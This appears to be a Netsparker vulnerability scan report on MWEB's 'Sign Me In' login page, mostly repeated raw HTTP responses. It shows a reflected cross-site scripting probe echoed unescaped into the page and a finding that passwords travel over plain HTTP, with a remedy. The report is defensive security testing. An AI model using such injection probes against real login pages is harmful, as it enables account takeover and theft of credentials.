<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information"..
Date: Mon, 21 Mar 2011 17:22:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17717
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx?m_authType=3&m_emailAddress=netsparker%40example.com&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214538859809629" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000fd5)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000FD5)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information"..
Password Transmitted Over HTTP
Password Transmitted Over HTTP
1
TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take
- See the remedy for solution.
- Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
|
- /authentication.aspx
/authentication.aspx CONFIRMED |
Form target action
authentication.aspx
Request
GET /authentication.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
